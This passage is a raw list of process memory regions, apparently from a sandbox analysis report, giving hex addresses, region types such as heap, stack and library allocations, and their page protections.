page read and write
B2C23FF000
unkown
page read and write
28C88B2F000
heap
page read and write
7FF73AE3B000
unkown
page readonly
7FF8B7E00000
unkown
page readonly
28C877A5000
heap
page read and write
14B37327000
heap
page read and write
1E1A1EE3000
heap
page read and write
F138FE000
stack
page read and write
1BC8A899000
heap
page read and write
28C877C5000
heap
page read and write
28C88B3F000
heap
page read and write
18A64C19000
heap
page read and write
28C877C4000
heap
page read and write
1E1A1EEE000
heap
page read and write
28C87C75000
heap
page read and write
2720DB31000
heap
page read and write
28C87C4C000
heap
page read and write
1E1A066A000
heap
page read and write
18EBB821000
heap
page read and write
15310001000
trusted library allocation
page read and write
28CC30D0000
heap
page read and write
18EBB102000
heap
page read and write
28C87336000
heap
page read and write
1CCD86C4000
heap
page read and write
1EE627D0000
heap
page read and write
14B35505000
heap
page read and write
28C87CE1000
heap
page read and write
2545B590000
heap
page read and write
28C87308000
heap
page read and write
28C87C58000
heap
page read and write
22AE13CA000
heap
page read and write
28C888DF000
heap
page read and write
22AE12D0000
heap
page read and write
266C4240000
heap
page read and write
28C87C67000
heap
page read and write
28C88A4F000
heap
page read and write
153715F3000
heap
page read and write
28C88791000
heap
page read and write
28C87DBE000
heap
page read and write
2720DA70000
heap
page read and write
28E2ED1D000
heap
page read and write
7FF8B9F60000
unkown
page readonly
28C8734D000
heap
page read and write
28C87C41000
heap
page read and write
18A64FB0000
heap
page read and write
1AC9F685000
heap
page read and write
1733EFC9000
heap
page read and write
28C87CA2000
heap
page read and write
7FF7F7EF0000
unkown
page readonly
28C88610000
direct allocation
page read and write
F134F4000
stack
page read and write
7FF8B9F61000
unkown
page execute and read and write
28C88610000
direct allocation
page read and write
28C87C6F000
heap
page read and write
22AE13BD000
heap
page read and write
1436D9E3000
heap
page read and write
28814B8000
stack
page read and write
7FF8478C0000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
28E2CD70000
trusted library allocation
page read and write
7FF847690000
trusted library allocation
page read and write
2720DB31000
heap
page read and write
1A96E484000
heap
page read and write
7FF847693000
trusted library allocation
page execute and read and write
18EBB2A0000
trusted library allocation
page read and write
16180295000
heap
page read and write
28C876B9000
heap
page read and write
28C877D5000
heap
page read and write
257A314C000
heap
page read and write
1F23A863000
direct allocation
page read and write
1CCD86D0000
heap
page read and write
7FF847920000
trusted library allocation
page read and write
153018E8000
trusted library allocation
page read and write
18EBB2A0000
trusted library allocation
page read and write
173422E4000
heap
page read and write
28C88FD0000
direct allocation
page read and write
20D5DE93000
heap
page read and write
28C88744000
heap
page read and write
28C877E1000
heap
page read and write
28C88B7D000
heap
page read and write
28C87D30000
heap
page read and write
28FE11F0000
heap
page read and write
1CCD86C4000
heap
page read and write
1CCD86D1000
heap
page read and write
28C87CD4000
heap
page read and write
1CCD86D2000
heap
page read and write
28C88A3C000
heap
page read and write
97AE78000
stack
page read and write
1AC9F6AE000
heap
page read and write
28C88F30000
direct allocation
page read and write
5CB19FF000
unkown
page read and write
28E2CEC6000
heap
page read and write
1D608330000
heap
page read and write
7FF8B93C0000
unkown
page readonly
18EBD0AD000
heap
page read and write
51AD6FF000
stack
page read and write
28C87CB7000
heap
page read and write
7FF8478A0000
trusted library allocation
page read and write
16180290000
heap
page read and write
1E1A0672000
heap
page read and write
18EBB0E7000
heap
page read and write
1436D9C6000
heap
page read and write
28C888DF000
heap
page read and write
F136FF000
stack
page read and write
7FF7F7E81000
unkown
page execute read
28C876B1000
heap
page read and write
28C88DEB000
heap
page read and write
7FF84784A000
trusted library allocation
page read and write
241A8830000
heap
page read and write
14B35A7A000
heap
page read and write
7FF8A8F1B000
unkown
page execute and read and write
18EBB0A2000
heap
page read and write
28E2CE20000
heap
page read and write
153739D0000
trusted library section
page read and write
1CCD86D1000
heap
page read and write
7FF8A868F000
unkown
page execute and read and write
173422DC000
heap
page read and write
7FF847960000
trusted library allocation
page read and write
1436E11C000
heap
page read and write
7FF8A9398000
unkown
page read and write
28C876B9000
heap
page read and write
1537161E000
heap
page read and write
18EBB0FD000
heap
page read and write
1733EEF9000
heap
page read and write
18EBB800000
heap
page read and write
28C87DCA000
heap
page read and write
28C877D3000
heap
page read and write
28C88208000
direct allocation
page read and write
26243071000
heap
page read and write
7FF847920000
trusted library allocation
page read and write
1F23A7D2000
heap
page read and write
18EBB819000
heap
page read and write
7FF8476B0000
trusted library allocation
page read and write
18EBB0F5000
heap
page read and write
28C87C97000
heap
page read and write
1BF4F6DA000
heap
page read and write
28C88610000
direct allocation
page read and write
B062DBC000
stack
page read and write
28C88F50000
direct allocation
page read and write
28C88B60000
heap
page read and write
173422D0000
heap
page read and write
21D4D720000
heap
page read and write
28C877D5000
heap
page read and write
28C898E0000
direct allocation
page read and write
26CD27E1000
heap
page read and write
28C88610000
direct allocation
page read and write
7FF847786000
trusted library allocation
page execute and read and write
18A64C1A000
heap
page read and write
22AE1355000
heap
page read and write
1BC8A8B7000
heap
page read and write
28C88B85000
heap
page read and write
18EBB0FD000
heap
page read and write
7FF8A81A7000
unkown
page execute and read and write
1436DA03000
heap
page read and write
7FF8A8838000
unkown
page execute and read and write
28C88B3F000
heap
page read and write
26CD27E1000
heap
page read and write
17342253000
heap
page read and write
7FF8476A0000
trusted library allocation
page read and write
257A315B000
heap
page read and write
4B4BFFF000
stack
page read and write
28C88A13000
heap
page read and write
1436E129000
heap
page read and write
17342270000
heap
page read and write
28C8724C000
direct allocation
page read and write
14B35512000
heap
page read and write
18EBD0A4000
heap
page read and write
2545B220000
heap
page read and write
28C877C3000
heap
page read and write
1E1A0669000
heap
page read and write
7FF8B9069000
unkown
page execute and read and write
28C88759000
heap
page read and write
18EBB7FE000
heap
page read and write
7FF8B93D6000
unkown
page execute and read and write
28C88765000
heap
page read and write
28C88B7D000
heap
page read and write
AC26CFF000
stack
page read and write
28C876B9000
heap
page read and write
28C87CB8000
heap
page read and write
14B35A98000
heap
page read and write
1E19FFE0000
heap
page read and write
28B63400000
heap
page read and write
28C87BFE000
heap
page read and write
28C88862000
heap
page read and write
28C87D9A000
heap
page read and write
1BD20170000
heap
page read and write
1D608350000
heap
page read and write
1436E108000
heap
page read and write
7FF8B93D1000
unkown
page execute and read and write
28E2CEC3000
heap
page read and write
BF7F6FF000
stack
page read and write
98A071B000
stack
page read and write
7FF8B8CB1000
unkown
page execute and read and write
18D018C1000
heap
page read and write
257A3090000
heap
page read and write
2720DB31000
heap
page read and write
28C87C73000
heap
page read and write
28E2CE7E000
heap
page read and write
28C87D8B000
heap
page read and write
173421C1000
heap
page read and write
28C88B35000
heap
page read and write
18EBB0F4000
heap
page read and write
1436DBB0000
trusted library allocation
page read and write
1F23A766000
heap
page read and write
28C87C67000
heap
page read and write
18EBB823000
heap
page read and write
28E2CEB3000
heap
page read and write
266C3E60000
heap
page read and write
28C87D8E000
heap
page read and write
28C88B6F000
heap
page read and write
28C87D00000
heap
page read and write
28C88A0D000
heap
page read and write
199D3990000
heap
page read and write
7FF8A9397000
unkown
page execute and write copy
7FF8B7EB3000
unkown
page readonly
28C8878F000
heap
page read and write
18EBB80F000
heap
page read and write
28C8768B000
heap
page read and write
28C876A3000
heap
page read and write
1CCD86C4000
heap
page read and write
28C877CC000
heap
page read and write
2720DB31000
heap
page read and write
182DF99D000
heap
page read and write
20D5DEC1000
heap
page read and write
4B4C1B7000
stack
page read and write
18EBB0D2000
heap
page read and write
28C87D20000
heap
page read and write
1AC9F6AD000
heap
page read and write
28C88B7D000
heap
page read and write
28C877A7000
heap
page read and write
2880D43000
stack
page read and write
51AD7FE000
stack
page read and write
234DABB8000
heap
page read and write
28C877C9000
heap
page read and write
1E1A0655000
heap
page read and write
7FF8A8B22000
unkown
page execute and read and write
1BC8A894000
heap
page read and write
28C87802000
heap
page read and write
173422EC000
heap
page read and write
1EE13691000
heap
page read and write
1436D9E3000
heap
page read and write
1CCD86D1000
heap
page read and write
28E2D499000
heap
page read and write
14B35A7E000
heap
page read and write
2D0F6FC000
stack
page read and write
28C87C6B000
heap
page read and write
C3EDBFF000
stack
page read and write
7FF8A8519000
unkown
page execute and read and write
28C87C8F000
heap
page read and write
28C87D10000
heap
page read and write
28C88986000
heap
page read and write
272F7CC000
stack
page read and write
28C88A14000
heap
page read and write
28C87C5E000
heap
page read and write
28C87E0F000
heap
page read and write
1436F9BD000
heap
page read and write
95868FF000
stack
page read and write
20D5DEFD000
heap
page read and write
28C88733000
heap
page read and write
24FFDFF000
unkown
page read and write
28B63325000
heap
page read and write
1E1A01BD000
heap
page read and write
28C87D74000
heap
page read and write
28C87B63000
heap
page read and write
18EBB0F8000
heap
page read and write
1CCD86C4000
heap
page read and write
1AC9F855000
heap
page read and write
7FF847884000
trusted library allocation
page read and write
7FF8B8F9A000
unkown
page execute and write copy
28C87D8F000
heap
page read and write
1619A3D1000
heap
page read and write
28C87B27000
heap
page read and write
28C88B31000
heap
page read and write
7FF8A8D69000
unkown
page execute and read and write
14B354D2000
heap
page read and write
B513AFF000
stack
page read and write
28C88794000
heap
page read and write
28C87C67000
heap
page read and write
12FA3FE000
stack
page read and write
6A089FF000
unkown
page read and write
28C886C0000
direct allocation
page read and write
153716E0000
heap
page read and write
7FF8B984C000
unkown
page read and write
1733EF7B000
heap
page read and write
1EE627F0000
heap
page read and write
7FF8A86A1000
unkown
page execute and read and write
1436DBF7000
heap
page read and write
28C88FE0000
direct allocation
page read and write
1EE13691000
heap
page read and write
28E2D499000
heap
page read and write
1436E12A000
heap
page read and write
2545B3A1000
heap
page read and write
16181D07000
trusted library allocation
page read and write
2720DB10000
heap
page read and write
199D3970000
heap
page read and write
1436D9F2000
heap
page read and write
28B63337000
heap
page read and write
1429BA50000
heap
page read and write
AC26AFC000
stack
page read and write
17341166000
heap
page read and write
28C87BFE000
heap
page read and write
19322380000
heap
page read and write
7FF8476AD000
trusted library allocation
page execute and read and write
28C88690000
direct allocation
page read and write
1436DA25000
heap
page read and write
18EBB6AE000
heap
page read and write
28C88248000
direct allocation
page read and write
1D608350000
heap
page read and write
1733EF18000
heap
page read and write
7FF847A20000
trusted library allocation
page read and write
161801B1000
heap
page read and write
32C6FE4000
stack
page read and write
7FF73AE11000
unkown
page execute read
16182E1B000
trusted library allocation
page read and write
1436D990000
heap
page read and write
16180110000
heap
page read and write
1733EF7A000
heap
page read and write
28C87B52000
heap
page read and write
1EE1367A000
heap
page read and write
1F23A76B000
heap
page read and write
28C88B55000
heap
page read and write
22AE12B0000
heap
page read and write
4B4BAD3000
stack
page read and write
1436D9C8000
heap
page read and write
22AE13BD000
heap
page read and write
1F23A7C4000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2D470000
heap
page read and write
28C87704000
heap
page read and write
7FF8B8B10000
unkown
page readonly
28C87C76000
heap
page read and write
14B35AA9000
heap
page read and write
1733EEF7000
heap
page read and write
28C87CD4000
heap
page read and write
26CD2990000
heap
page read and write
28C87737000
heap
page read and write
18EBB81B000
heap
page read and write
18EBB0D2000
heap
page read and write
28C88B85000
heap
page read and write
28812FE000
stack
page read and write
18EBB0FB000
heap
page read and write
1E19FFCB000
heap
page read and write
97AFFF000
stack
page read and write
1A96E6F0000
heap
page read and write
28C87A30000
heap
page read and write
234DABC0000
heap
page read and write
7FF847930000
trusted library allocation
page read and write
1E1A064F000
heap
page read and write
28C88B55000
heap
page read and write
28C87CD6000
heap
page read and write
241A8577000
heap
page read and write
4D5CAFF000
stack
page read and write
28C87D98000
heap
page read and write
D5384FC000
stack
page read and write
28C8776C000
heap
page read and write
28CC3545000
heap
page read and write
26CD2790000
heap
page read and write
28C87C28000
heap
page read and write
28C857C0000
heap
page read and write
28CC31D0000
heap
page read and write
14B354CE000
heap
page read and write
28C87D99000
heap
page read and write
1E1A004D000
heap
page read and write
28C87CBA000
heap
page read and write
1CCD86C4000
heap
page read and write
1F23A75C000
heap
page read and write
95866FC000
stack
page read and write
1CCD86C4000
heap
page read and write
28C88B7D000
heap
page read and write
28E2CEC2000
heap
page read and write
28C87B74000
heap
page read and write
1436DA29000
heap
page read and write
28E2CEBB000
heap
page read and write
1CCD86D1000
heap
page read and write
18EBB090000
heap
page read and write
1F23A737000
heap
page read and write
28E2D488000
heap
page read and write
18EBB0E3000
heap
page read and write
153734EA000
heap
page read and write
28C87D78000
heap
page read and write
1619A3C0000
heap
page read and write
7FF847746000
trusted library allocation
page read and write
1BC8A9B0000
heap
page read and write
28C87D68000
heap
page read and write
28E2ED24000
heap
page read and write
14B35A98000
heap
page read and write
18EBB300000
heap
page read and write
B6EE8FC000
stack
page read and write
28C88B7F000
heap
page read and write
28C87C2A000
heap
page read and write
1436D9C5000
heap
page read and write
28C87DBE000
heap
page read and write
27258B11000
heap
page read and write
1BD20165000
heap
page read and write
7FF8478B0000
trusted library allocation
page read and write
28C87D8A000
heap
page read and write
28E2CECE000
heap
page read and write
28C88B64000
heap
page read and write
15372F20000
trusted library allocation
page read and write
28C87CA8000
heap
page read and write
1619A0E7000
heap
page execute and read and write
28C87CA8000
heap
page read and write
7FF73AE11000
unkown
page execute read
28C88660000
direct allocation
page read and write
1733EEF7000
heap
page read and write
18D018A0000
heap
page read and write
1F23A7AF000
heap
page read and write
1436DA26000
heap
page read and write
14B35AB4000
heap
page read and write
68D9B5C000
stack
page read and write
173422EC000
heap
page read and write
7FF8A8E6D000
unkown
page execute and read and write
28C87391000
heap
page read and write
28E2D49A000
heap
page read and write
28C87DA4000
heap
page read and write
16183A5F000
trusted library allocation
page read and write
14B35533000
heap
page read and write
28C87C77000
heap
page read and write
27258A40000
heap
page read and write
1E1A064E000
heap
page read and write
28C87DCA000
heap
page read and write
1F23C1B0000
direct allocation
page read and write
28C87C1F000
heap
page read and write
28C88B51000
heap
page read and write
28B6331B000
heap
page read and write
28C87D37000
heap
page read and write
27258BF0000
heap
page read and write
1CCD86D1000
heap
page read and write
28E2CE39000
heap
page read and write
14B35A73000
heap
page read and write
173422D0000
heap
page read and write
28C88220000
direct allocation
page read and write
18EBB0E3000
heap
page read and write
18D018C1000
heap
page read and write
2238D07A000
heap
page read and write
19322550000
heap
page read and write
18EBB6A7000
heap
page read and write
7FF8A80F2000
unkown
page execute and read and write
28C87D93000
heap
page read and write
2BAD9811000
heap
page read and write
25CAEB00000
heap
page read and write
28C88BB5000
heap
page read and write
28C88B49000
heap
page read and write
28C8732E000
heap
page read and write
17341081000
heap
page read and write
7FF847990000
trusted library allocation
page read and write
1A6A1460000
heap
page read and write
1CCD86C4000
heap
page read and write
23315460000
heap
page read and write
1E1A004D000
heap
page read and write
14B35A91000
heap
page read and write
28E2CDE0000
heap
page read and write
28E2CEB6000
heap
page read and write
7FF8BFABB000
unkown
page execute and read and write
28813BF000
stack
page read and write
1E1A0039000
heap
page read and write
2BAD9811000
heap
page read and write
1436DBFA000
heap
page read and write
28C87A31000
heap
page read and write
28C87DA4000
heap
page read and write
16181EA8000
trusted library allocation
page read and write
28C87DBE000
heap
page read and write
E4DF7AF000
stack
page read and write
28C88842000
heap
page read and write
28C87D80000
heap
page read and write
272FBFF000
stack
page read and write
173422DC000
heap
page read and write
28C87AF1000
heap
page read and write
16181C70000
heap
page read and write
18EBB0D9000
heap
page read and write
7FF8B93D8000
unkown
page read and write
1C7FBA58000
heap
page read and write
7FF8479F0000
trusted library allocation
page read and write
28C88630000
direct allocation
page read and write
28C87686000
heap
page read and write
89021FF000
unkown
page read and write
14B35AA9000
heap
page read and write
7FF8479D0000
trusted library allocation
page read and write
28E2CDE8000
heap
page read and write
7FF7F7F14000
unkown
page read and write
C3EDAFF000
unkown
page read and write
1436DA32000
heap
page read and write
7FF847840000
trusted library allocation
page read and write
28C88690000
direct allocation
page read and write
28C87352000
heap
page read and write
1BC8A8C4000
heap
page read and write
28C87B5C000
heap
page read and write
161801AD000
heap
page read and write
1733EFBA000
heap
page read and write
54EBEFF000
stack
page read and write
7FF8478E0000
trusted library allocation
page read and write
153733CA000
heap
page read and write
14B35A9E000
heap
page read and write
28C88620000
direct allocation
page read and write
1B839BC0000
heap
page read and write
28C87C6C000
heap
page read and write
38F01FF000
stack
page read and write
28C87CE6000
heap
page read and write
1E1A0651000
heap
page read and write
28C87737000
heap
page read and write
28C88B2F000
heap
page read and write
15373040000
heap
page execute and read and write
28C8596B000
heap
page read and write
28C87DBE000
heap
page read and write
28C88A0D000
heap
page read and write
28C87C77000
heap
page read and write
1EE62895000
heap
page read and write
28C877C4000
heap
page read and write
16182B46000
trusted library allocation
page read and write
7FF8A8B15000
unkown
page execute and read and write
1619A130000
heap
page read and write
28C87D8E000
heap
page read and write
28C886D0000
direct allocation
page read and write
1E1A0040000
heap
page read and write
1BD201E7000
heap
page read and write
1E19FFC7000
heap
page read and write
1CCD86C4000
heap
page read and write
257A3125000
heap
page read and write
1BC8A870000
heap
page read and write
28C87DCA000
heap
page read and write
28C87D93000
heap
page read and write
14B35A9E000
heap
page read and write
28C87CA2000
heap
page read and write
28C87DAA000
heap
page read and write
28C87769000
heap
page read and write
28C87C3E000
heap
page read and write
14B37460000
heap
page read and write
28C8873A000
heap
page read and write
28C87D5B000
heap
page read and write
28E2CC50000
heap
page read and write
7FF8B8F8C000
unkown
page execute and read and write
28C87D99000
heap
page read and write
1CCD86D0000
heap
page read and write
28C8766D000
heap
page read and write
28E2CE5D000
heap
page read and write
1E1A1EF4000
heap
page read and write
28B63337000
heap
page read and write
7FF847832000
trusted library allocation
page read and write
28C8768F000
heap
page read and write
1BD201D0000
heap
page read and write
14B35A8E000
heap
page read and write
28C87CA0000
heap
page read and write
1CCD86C4000
heap
page read and write
7FF847900000
trusted library allocation
page read and write
20D5DD10000
heap
page read and write
1436DB90000
heap
page read and write
1436D9DF000
heap
page read and write
28E2CFBE000
heap
page read and write
28C88B49000
heap
page read and write
1E1A004D000
heap
page read and write
28C87789000
heap
page read and write
14B354F7000
heap
page read and write
1BC8A8B7000
heap
page read and write
28B63325000
heap
page read and write
28C87D30000
heap
page read and write
1CCD86D1000
heap
page read and write
1E1A0658000
heap
page read and write
14B35527000
heap
page read and write
2881437000
stack
page read and write
26243050000
heap
page read and write
1E1A0660000
heap
page read and write
22AE1396000
heap
page read and write
28C87C74000
heap
page read and write
1F23A74A000
heap
page read and write
234DAD70000
heap
page read and write
28C87322000
heap
page read and write
1CCD9F40000
heap
page read and write
28C877C9000
heap
page read and write
28C87631000
heap
page read and write
7FF8A81C2000
unkown
page execute and read and write
1E19FF30000
heap
page read and write
7FF8B8CC3000
unkown
page read and write
28C88B55000
heap
page read and write
21AD4790000
heap
page read and write
20C0AD65000
heap
page read and write
173422D0000
heap
page read and write
7FF8A86A9000
unkown
page read and write
7FF8B9070000
unkown
page readonly
1733EF13000
heap
page read and write
1E19FF50000
heap
page read and write
18EBB0F8000
heap
page read and write
7FF7F7F1E000
unkown
page read and write
28C88730000
heap
page read and write
28C8767C000
heap
page read and write
7FF8A8E63000
unkown
page execute and read and write
28C88110000
direct allocation
page read and write
28C87C27000
heap
page read and write
7FF847740000
trusted library allocation
page read and write
1F23A7C9000
heap
page read and write
28C87D7E000
heap
page read and write
14B35A80000
heap
page read and write
28E2D499000
heap
page read and write
1EE13691000
heap
page read and write
28E2CE76000
heap
page read and write
1436E129000
heap
page read and write
1436DB70000
heap
page read and write
28E2CE84000
heap
page read and write
28C87B3D000
heap
page read and write
28C87BFE000
heap
page read and write
28C87C3C000
heap
page read and write
2238CEC0000
heap
page read and write
4D5FFDF000
stack
page read and write
193225A0000
heap
page read and write
7FF8476BD000
trusted library allocation
page execute and read and write
1F23A729000
heap
page read and write
28C87D80000
heap
page read and write
14B35533000
heap
page read and write
28C88806000
heap
page read and write
7FF847A80000
trusted library allocation
page read and write
1E1A0660000
heap
page read and write
28C8733A000
heap
page read and write
1436E114000
heap
page read and write
80824FF000
unkown
page read and write
20C0AB20000
heap
page read and write
1BC8A970000
heap
page read and write
7FF847A90000
trusted library allocation
page read and write
28C88B2F000
heap
page read and write
28E2CFBB000
heap
page read and write
1CCD86C4000
heap
page read and write
1EE137B0000
heap
page read and write
1436DA90000
heap
page read and write
17342CD9000
heap
page read and write
7FF847878000
trusted library allocation
page read and write
241A8570000
heap
page read and write
272FAFF000
stack
page read and write
7FF8A8C63000
unkown
page execute and read and write
1B839C20000
heap
page read and write
28C88738000
heap
page read and write
7FF847874000
trusted library allocation
page read and write
28C87CF0000
heap
page read and write
7FF8479E4000
trusted library allocation
page read and write
7FF847AB0000
trusted library allocation
page read and write
28C87DA8000
heap
page read and write
1AC9F686000
heap
page read and write
182DF920000
heap
page read and write
1CCD86C4000
heap
page read and write
1619A21E000
heap
page read and write
28C87D97000
heap
page read and write
7FF7F7E81000
unkown
page execute read
7FF8B8F99000
unkown
page execute and read and write
1E19FE50000
heap
page read and write
7FF8A937D000
unkown
page execute and read and write
257A314C000
heap
page read and write
28C87D2A000
heap
page read and write
1E1A0030000
heap
page read and write
1F23A820000
direct allocation
page read and write
15310075000
trusted library allocation
page read and write
1EE628AA000
heap
page read and write
28C88F50000
direct allocation
page read and write
28C87B62000
heap
page read and write
1AC9F68B000
heap
page read and write
1436D9EF000
heap
page read and write
28C87322000
heap
page read and write
28E2D499000
heap
page read and write
28E2CEBC000
heap
page read and write
23315580000
heap
page read and write
C0A67BF000
stack
page read and write
7FF8479A0000
trusted library allocation
page read and write
28C8874D000
heap
page read and write
14B35A8F000
heap
page read and write
28C877E6000
heap
page read and write
1BF4F6C5000
heap
page read and write
1436D9F0000
heap
page read and write
28C876F1000
heap
page read and write
18EBB105000
heap
page read and write
28E2CFB0000
heap
page read and write
18EBB6AA000
heap
page read and write
18EBB110000
heap
page read and write
1CCD86C4000
heap
page read and write
7FF8A8853000
unkown
page read and write
7FF8BFABE000
unkown
page read and write
28C87C77000
heap
page read and write
7FF73AE10000
unkown
page readonly
7FF8B7EEB000
unkown
page read and write
16191CF1000
trusted library allocation
page read and write
20D5DEA3000
heap
page read and write
153737D3000
heap
page read and write
28C87C57000
heap
page read and write
1436D9E1000
heap
page read and write
28E2CE6E000
heap
page read and write
28C87C88000
heap
page read and write
1CCD8580000
heap
page read and write
28E2CE37000
heap
page read and write
28E2D481000
heap
page read and write
28C88758000
heap
page read and write
1E19FFCA000
heap
page read and write
ED9D1BB000
stack
page read and write
1CCD86D1000
heap
page read and write
28C88B66000
heap
page read and write
4085FF000
stack
page read and write
28E2CFB4000
heap
page read and write
28CC3540000
heap
page read and write
17341164000
heap
page read and write
7FF8B8B3D000
unkown
page execute and read and write
1CCD86A8000
heap
page read and write
17341283000
heap
page read and write
28C8873A000
heap
page read and write
1436D9F8000
heap
page read and write
1EE62890000
heap
page read and write
1CCD86BE000
heap
page read and write
1733EFBF000
heap
page read and write
1619A522000
heap
page read and write
1436E129000
heap
page read and write
7FF847940000
trusted library allocation
page read and write
28C886A0000
direct allocation
page read and write
18A64C21000
heap
page read and write
1E1A0058000
heap
page read and write
153737A3000
heap
page read and write
1E1A0669000
heap
page read and write
1619A539000
heap
page read and write
14B35539000
heap
page read and write
18EBB10B000
heap
page read and write
1436DC70000
heap
page read and write
1436E112000
heap
page read and write
28E2D49F000
heap
page read and write
1C7FBA61000
heap
page read and write
7FF847850000
trusted library allocation
page execute and read and write
F134E5000
stack
page read and write
4B4C0F9000
stack
page read and write
7FF7F7EF0000
unkown
page readonly
7FF847A40000
trusted library allocation
page read and write
1E1A0652000
heap
page read and write
28C8768B000
heap
page read and write
18EBB6AA000
heap
page read and write
7FF8A8222000
unkown
page execute and read and write
28C87D8C000
heap
page read and write
28C87CB8000
heap
page read and write
28C87D68000
heap
page read and write
18EBB105000
heap
page read and write
28C88A2F000
heap
page read and write
1E1A1EF4000
heap
page read and write
14B35510000
heap
page read and write
B4AF87F000
stack
page read and write
80825FF000
stack
page read and write
18EBB818000
heap
page read and write
28C87B75000
heap
page read and write
28C87F90000
direct allocation
page read and write
28C886D0000
direct allocation
page read and write
28C87C61000
heap
page read and write
16181B00000
trusted library allocation
page read and write
1F23A5A0000
heap
page read and write
1CCD86C4000
heap
page read and write
14B35528000
heap
page read and write
28C87D9D000
heap
page read and write
7FF8B9840000
unkown
page readonly
28C88B85000
heap
page read and write
153715DF000
heap
page read and write
1CCD86BE000
heap
page read and write
28C88758000
heap
page read and write
14B35500000
heap
page read and write
7FF7F7F0A000
unkown
page read and write
1EE628C0000
heap
page read and write
28E2CE3D000
heap
page read and write
20D5DDF0000
heap
page read and write
BF7F67F000
stack
page read and write
28C88A0A000
heap
page read and write
17342252000
heap
page read and write
161832BE000
trusted library allocation
page read and write
1CCD86D1000
heap
page read and write
51AD87F000
stack
page read and write
6AB0AFF000
unkown
page read and write
28C88DE6000
heap
page read and write
28C8875D000
heap
page read and write
28C88B69000
heap
page read and write
28C88741000
heap
page read and write
1436DBFA000
heap
page read and write
1CCD86D1000
heap
page read and write
16191F70000
trusted library allocation
page read and write
28E2D484000
heap
page read and write
257A3108000
heap
page read and write
15371670000
heap
page read and write
28C87DBE000
heap
page read and write
1C7FBC50000
heap
page read and write
14B35450000
heap
page read and write
1436D9EC000
heap
page read and write
28C87B5C000
heap
page read and write
7FF847AF0000
trusted library allocation
page read and write
28E2CE8B000
heap
page read and write
7FF8B8F71000
unkown
page execute and read and write
17342283000
heap
page read and write
1619A0F0000
heap
page read and write
28C87D20000
heap
page read and write
28C87D7B000
heap
page read and write
1CCD86C4000
heap
page read and write
18EBD0A1000
heap
page read and write
266C3EB0000
heap
page read and write
28C87C28000
heap
page read and write
18EBB6AB000
heap
page read and write
28C88B3F000
heap
page read and write
12FA37F000
stack
page read and write
7FF8479F8000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
14B3551C000
heap
page read and write
8243FF000
unkown
page read and write
1E1A0020000
heap
page read and write
28C88852000
heap
page read and write
16180030000
heap
page read and write
1F23A7E3000
heap
page read and write
4B4BBDF000
stack
page read and write
1436F9B1000
heap
page read and write
28C882A0000
direct allocation
page read and write
1AC9F696000
heap
page read and write
1436D9FF000
heap
page read and write
17340D4C000
heap
page read and write
1CCD86C4000
heap
page read and write
7FF8B7EEE000
unkown
page readonly
48A35FF000
stack
page read and write
28C873C5000
heap
page read and write
1CCD86C4000
heap
page read and write
1436D9D6000
heap
page read and write
1CCD86C4000
heap
page read and write
F134E2000
stack
page read and write
1436DBB0000
trusted library allocation
page read and write
15372F00000
heap
page readonly
1E1A1EE2000
heap
page read and write
7FF847692000
trusted library allocation
page read and write
199D3940000
heap
page read and write
28C88794000
heap
page read and write
14B35525000
heap
page read and write
20C0AC61000
heap
page read and write
28C877D5000
heap
page read and write
1C7FB9C0000
heap
page read and write
15373A10000
heap
page read and write
27258A20000
heap
page read and write
16181AD0000
trusted library allocation
page read and write
7FF847980000
trusted library allocation
page read and write
7FF847970000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
28C88AAB000
heap
page read and write
14B37322000
heap
page read and write
18EBB801000
heap
page read and write
1436F9C4000
heap
page read and write
173422E4000
heap
page read and write
26CD27D8000
heap
page read and write
28C88B5F000
heap
page read and write
22AE13C1000
heap
page read and write
28E2CE65000
heap
page read and write
28C87D25000
heap
page read and write
1436E10C000
heap
page read and write
28C88B6F000
heap
page read and write
7FF8B9F76000
unkown
page execute and write copy
28C87C68000
heap
page read and write
28C87C00000
heap
page read and write
7FF847A10000
trusted library allocation
page read and write
14B35A75000
heap
page read and write
2720DC10000
heap
page read and write
28C87B7C000
heap
page read and write
14B3553E000
heap
page read and write
199D399D000
heap
page read and write
28C87701000
heap
page read and write
1AC9F4E0000
heap
page read and write
24FFEFF000
stack
page read and write
1F23A7C2000
heap
page read and write
161832C7000
trusted library allocation
page read and write
1E1A0669000
heap
page read and write
1CCD86D1000
heap
page read and write
21D4D9E0000
heap
page read and write
18EBB818000
heap
page read and write
21AD4641000
heap
page read and write
24FFCFC000
stack
page read and write
7FF847840000
trusted library allocation
page read and write
1E1A0016000
heap
page read and write
1C7FB9A0000
heap
page read and write
1436D9FD000
heap
page read and write
1733EFC9000
heap
page read and write
28C88A14000
heap
page read and write
17342261000
heap
page read and write
288107E000
stack
page read and write
28C88B66000
heap
page read and write
1E19FF70000
trusted library allocation
page read and write
1436D9E9000
heap
page read and write
234DABC0000
heap
page read and write
40847F000
stack
page read and write
7FF8476EC000
trusted library allocation
page execute and read and write
1AC9F6BA000
heap
page read and write
1BF4F6C0000
heap
page read and write
28C882AC000
direct allocation
page read and write
8FA42FF000
unkown
page read and write
28C88620000
direct allocation
page read and write
1EE629A0000
heap
page read and write
28C88B6F000
heap
page read and write
28C87C54000
heap
page read and write
21AD4641000
heap
page read and write
28C858FE000
heap
page read and write
28C88B55000
heap
page read and write
28E2CEB3000
heap
page read and write
7FF8B9061000
unkown
page execute and read and write
18EBB0F8000
heap
page read and write
1436DA03000
heap
page read and write
28C88620000
direct allocation
page read and write
17342251000
heap
page read and write
28E2D478000
heap
page read and write
7FF847860000
trusted library allocation
page execute and read and write
28C87BFE000
heap
page read and write
193223A0000
heap
page read and write
28E2CE32000
heap
page read and write
28C87AFF000
heap
page read and write
1C7FBB40000
heap
page read and write
18EBD0B4000
heap
page read and write
28C858B0000
heap
page read and write
17341166000
heap
page read and write
7FF8B8B39000
unkown
page execute and read and write
28C87789000
heap
page read and write
28C881C0000
direct allocation
page read and write
7FF8A8237000
unkown
page execute and read and write
20C0AC51000
heap
page read and write
153737B0000
heap
page read and write
28E2CE7E000
heap
page read and write
21AD4641000
heap
page read and write
28C88620000
direct allocation
page read and write
4D5CB7F000
stack
page read and write
1619A47C000
heap
page read and write
257A312B000
heap
page read and write
1E1A004A000
heap
page read and write
28E2CE23000
heap
page read and write
28C88758000
heap
page read and write
1436F9B4000
heap
page read and write
7FF73AE3B000
unkown
page readonly
234DAF30000
heap
page read and write
199D399B000
heap
page read and write
7FF8A825C000
unkown
